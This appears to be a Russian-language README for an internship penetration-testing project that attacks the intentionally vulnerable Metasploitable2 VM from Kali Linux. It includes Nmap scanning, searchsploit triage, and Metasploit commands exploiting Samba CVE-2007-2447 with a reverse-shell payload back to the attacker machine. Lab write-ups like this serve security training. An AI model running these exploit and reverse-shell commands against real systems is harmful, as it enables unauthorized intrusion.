
Практический пентест-проект с использованием Kali Linux против Metasploitable2. Включает полный рабочий процесс: сканирование Nmap, перечисление сервисов, эксплуатацию через Metasploit (Samba CVE-2007-2447), проверку пост-эксплуатации и шаги по смягчению последствий. В репозитории содержатся команды, результаты и отчёт, демонстрирующие как наступательные техники, так и защитные рекомендации.
Проект стажировки 2 — Тестирование на проникновение Metasploitable2
Краткое описание: Этот проект демонстрирует полный рабочий процесс тестирования на проникновение: разведка, перечисление, эксплуатация, пост-эксплуатационная проверка и рекомендации по смягчению последствий. В качестве целевой машины используется Metasploitable2, а атакующая машина — Kali Linux.
Инструменты: Kali Linux (атакующий) Nmap (разведка) Metasploit Framework (эксплуатация) SearchSploit / Exploit-DB (триаж)
Выполненные шаги:
Сканирование:
sudo nmap -sS -sV -p- -T4 --open -oA scans/target 192.168.x.x
Обнаруженные сервисы (примеры): vsftpd 2.3.4 (баннер порта 21), Samba smbd 3.x (порт 445).
Перечисление и триаж:
searchsploit --nmap scans/target.xml searchsploit samba 3.0.20
Сопоставлены сервисы с потенциальными эксплойтами (бэкдор vsftpd, Samba username-map).
Эксплуатация
msfconsole use exploit/multi/samba/usermap_script set RHOSTS 192.168.x.x set payload cmd/unix/reverse set LHOST <kali-ip> set LPORT 4444 exploit
Получена интерактивная оболочка и проверен контекст пользователя.id uname -aРезультат Успешно получена удалённая оболочка через эксплойт Samba, задокументирован путь атаки и составлен план по смягчению последствий. Полные журналы и выводы команд сохранены в папке scans/.